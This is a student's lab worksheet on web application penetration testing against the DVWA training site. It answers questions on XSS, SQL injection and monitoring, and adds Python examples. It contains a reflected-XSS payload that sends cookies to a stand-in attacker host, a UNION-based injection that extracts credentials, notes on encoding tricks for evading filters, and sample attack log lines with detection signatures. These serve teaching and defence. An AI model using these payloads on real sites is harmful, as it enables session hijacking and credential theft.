Lab #8 Perform a Website & Database Attack by Exploiting Identified Vulnerabilities


Submitted By sidiousnight
Lab #8 – Assessment Worksheet


Perform a Website & Database Attack by Exploiting Identified Vulnerabilities


LAB Assessment Questions & Answers



1. Why is it critical to perform a penetration test on a web application prior to production
Implementation?

To find and fix exploitable flaws (injection, cross-site scripting, weak authentication, server misconfiguration) while the application is still in a test environment, where a successful attack has no impact on real users or data and fixes are cheap. Once the application is in production every vulnerability it carries is reachable by anyone on the Internet, and remediation then means patching a live system, possibly after a breach has already happened.




2. What is a cross-site scripting attack? Explain in your own words.

Cross-site scripting (XSS) is a vulnerability, typically found in web applications, that lets an attacker inject client-side script (usually JavaScript) into web pages viewed by other users. Because the browser treats the injected script as part of the legitimate page, it runs with that site's origin and can read session cookies, make requests as the victim, or rewrite what the victim sees.




3. What is a reflective cross-site scripting attack?

In a reflected (non-persistent) XSS attack the web application builds its response page directly from unsanitized data in the request, such as a query-string parameter or form field. The attacker crafts a URL whose parameter contains script (JavaScript, or historically VBScript), tricks the victim into following it, and the server reflects the script back inside the page, where the victim's browser executes it. Nothing is stored on the server, so each victim has to be delivered the malicious link.
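The reflection described above, as an added Python example that is not part of the original worksheet or of DVWA's own PHP code. It models DVWA's reflected-XSS page, which echoes the name query parameter into the response; the attacker URL, host names and page markup are constructed for the example, and a substring check stands in for the browser.

```python
import html
from urllib.parse import parse_qs, urlsplit

# Constructed attacker link (hypothetical host names): the "name" parameter is a
# URL-encoded <script> tag that ships the victim's cookie to the attacker.
ATTACK_URL = (
    "http://dvwa.local/vulnerabilities/xss_r/?name="
    "%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fattacker.example%2F%3Fc%3D%27"
    "%2Bdocument.cookie%3C%2Fscript%3E"
)


def name_from_url(url: str) -> str:
    """Extract the 'name' parameter the way the server sees it (URL-decoded)."""
    query = parse_qs(urlsplit(url).query)
    return query.get("name", [""])[0]


def render_vulnerable(name: str) -> str:
    """Reflects the parameter verbatim into the page: the injectable pattern."""
    return f"<pre>Hello {name}</pre>"


def render_safe(name: str) -> str:
    """Encodes the parameter for an HTML text context before reflecting it,
    so '<' and quotes reach the browser as entities, not as markup."""
    return f"<pre>Hello {html.escape(name, quote=True)}</pre>"


def page_executes_script(page: str) -> bool:
    """Crude stand-in for the browser's HTML parser: is there a live <script> tag?"""
    return "<script>" in page.lower()


if __name__ == "__main__":
    payload = name_from_url(ATTACK_URL)
    print("reflected payload:", payload)
    print("vulnerable page  :", render_vulnerable(payload))
    print("escaped page     :", render_safe(payload))
```

html.escape is the right fix only for an HTML text or attribute context; a value reflected inside a script block, an event handler or a URL needs the encoding appropriate to that context, which is why output encoding is applied per sink rather than once on input.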




4. What common method of obfuscation is used in most real world SQL attacks?

Encoding. Most real-world injection payloads hide the characters and keywords that input filters and IDS signatures look for: URL-encoding or double-encoding of quotes and spaces (%27, %20, %2527), building strings with hex literals or CHAR()/CONCAT() so that no literal quote is sent, inline comments (/**/) in place of spaces, and mixed-case keywords (uNiOn SeLeCt). Character scrambling, masking, numeric variance and nulling, by contrast, are database data-masking techniques built from SQL Server's string functions to protect copies of sensitive data; they are defensive tools, not attacker obfuscation.




5. Which web application attack is more prone to extracting privacy data elements out of a database?

SQL injection. The injected input becomes part of a query that the application runs under its own, often over-privileged, database account, so an attacker can read arbitrary tables, including user records, credentials and other private data, rather than only the rows the page was meant to show. The primary defence is parameterized queries (prepared statements), so that user input can never be interpreted as SQL, combined with a least-privilege database account, input validation and encoding of output. Writing the site in Java, or any other language, does not by itself prevent injection.
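The data extraction described above, as an added Python example that is not part of the original worksheet or of DVWA's PHP/MySQL code. It uses an in-memory SQLite table with constructed sample rows in the shape of DVWA's users table (the names and password hashes are placeholders), and shows the string-concatenated query beside its parameterized replacement.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed stand-in for DVWA's users table; the rows are sample data."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT, "
        "user TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?, ?, ?)",
        [
            (1, "admin", "admin", "admin", "h4sh-admin"),
            (2, "Gordon", "Brown", "gordonb", "h4sh-gordonb"),
            (3, "Hack", "Me", "1337", "h4sh-1337"),
        ],
    )
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    """Builds the query by string concatenation: the injectable pattern.
    The page only intends to return first and last name for one user_id."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    """Binds the value as a parameter; it is compared as data, never parsed as SQL."""
    return conn.execute(
        "SELECT first_name, last_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchall()


# Constructed UNION-based payload: closes the open quote, appends a second SELECT
# with the same column count that reads credentials, and comments out the
# trailing quote the application adds ("--" is a line comment in SQLite and MySQL).
PAYLOAD = "' UNION SELECT user, password FROM users -- "


if __name__ == "__main__":
    db = make_db()
    print("intended use  :", lookup_vulnerable(db, "1"))
    print("injected      :", lookup_vulnerable(db, PAYLOAD))
    print("parameterized :", lookup_safe(db, PAYLOAD))
```

The injected rows come back in the first_name/last_name columns the page already renders, which is why UNION-based injection is so effective at pulling a whole credential table through a single lookup form. The parameterized version returns nothing for the same input because the whole payload is compared against user_id as a string. A least-privilege database account limits what a successful injection can reach but does not stop it; only the query construction does that.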




6. If you can monitor when SQL injections are performed on an SQL database, what would you
recommend as a security countermeasure to monitor your production SQL databases?

Log and monitor the queries that reach the production database and alert on injection indicators: unbalanced quote characters, comment sequences (--, #, /**/), UNION SELECT, tautologies such as 1=1, and unusually long, malformed or frequent queries from a single client. In practice that means a web application firewall or intrusion detection system in front of the application (ModSecurity with the OWASP Core Rule Set, or Snort, for example), query logging or auditing enabled on the database server, and alerts on failed queries, queries returning unexpected row counts, and any access to sensitive tables from the web application account. Regular, well-coordinated security audits of the application code complement the monitoring; they do not replace it.
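The detection logic recommended above, and the obfuscation discussed in question 4, as an added Python example that is not part of the original worksheet or of any real WAF or IDS. It normalizes the query parameters in constructed web-server access log lines (decoding twice, stripping inline comments, folding case) and then matches a small signature set, so an encoded and comment-padded UNION SELECT is caught by the same rule as the plain one. Host names, IP addresses and log lines are all constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import unquote_plus, urlsplit

# Constructed access-log lines (not from any real system). Lines 2, 3 and 5 carry
# SQL injection attempts; line 3 is obfuscated with /**/ comments, mixed case and
# a trailing MySQL "#" comment. The others are benign traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [12/May/2014:10:01:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1" 200 4321
10.0.0.5 - - [12/May/2014:10:01:09 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+OR+%271%27%3D%271&Submit=Submit HTTP/1.1" 200 4890
10.0.0.7 - - [12/May/2014:10:02:30 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27%2F**%2FuNiOn%2F**%2FsElEcT%2F**%2Fuser%2Cpassword%2F**%2Ffrom%2F**%2Fusers%23&Submit=Submit HTTP/1.1" 200 5120
10.0.0.9 - - [12/May/2014:10:03:11 +0000] "GET /dvwa/index.php HTTP/1.1" 200 1800
10.0.0.7 - - [12/May/2014:10:03:40 +0000] "GET /dvwa/vulnerabilities/sqli/?id=1%27+UNION+SELECT+user%2C+password+FROM+users--+-&Submit=Submit HTTP/1.1" 200 5120
10.0.0.9 - - [12/May/2014:10:04:02 +0000] "GET /dvwa/vulnerabilities/sqli/?id=2&Submit=Submit HTTP/1.1" 200 4301
"""

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

# Signatures are applied to the normalized value, so they can be written once
# in lower case with single spaces.
SIGNATURES = {
    "union_select": re.compile(r"\bunion\b.*\bselect\b"),
    "tautology": re.compile(r"\bor\b\s*'?(\w+)'?\s*=\s*'?\1\b"),
    "quote_break": re.compile(r"'\s*(or|and|union)\b"),
    "trailing_comment": re.compile(r"(--|#)[\s-]*$"),
}


def request_target(line: str) -> Optional[str]:
    """Pull the request path and query out of a combined-format log line."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def param_values(target: str) -> List[str]:
    """Split the query string without decoding, so normalize() sees the raw encoding."""
    query = urlsplit(target).query
    return [pair.partition("=")[2] for pair in query.split("&") if pair]


def normalize(value: str) -> str:
    """Undo the common obfuscations: (double) URL-encoding, inline comments used
    as spaces, odd whitespace and keyword case."""
    for _ in range(2):
        value = unquote_plus(value)
    value = re.sub(r"/\*.*?\*/", " ", value)
    value = re.sub(r"\s+", " ", value)
    return value.lower().strip()


def scan_log(log_text: str) -> List[Tuple[str, str, List[str]]]:
    """Return (client_ip, normalized_value, matched_signatures) per suspicious parameter."""
    hits = []
    for line in log_text.splitlines():
        target = request_target(line)
        if target is None:
            continue
        client_ip = line.split(" ", 1)[0]
        for value in param_values(target):
            norm = normalize(value)
            matched = [name for name, rx in SIGNATURES.items() if rx.search(norm)]
            if matched:
                hits.append((client_ip, norm, matched))
    return hits


if __name__ == "__main__":
    for ip, value, sigs in scan_log(SAMPLE_LOG):
        print(f"{ip}  {', '.join(sigs):32}  {value}")
```

Normalizing before matching is the whole point: a signature that looks for the literal string "UNION SELECT" misses the third line, while the normalized value is identical to the plain attack. The flip side is that aggressive normalization (decoding twice, collapsing comments) raises false positives on legitimate values that happen to contain percent signs or plus characters, so production rule sets score several weak indicators together rather than blocking on any single one.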




7. Given that Apache and Internet Information Services (IIS) are the two most popular web application
servers for Linux and Microsoft Windows…...
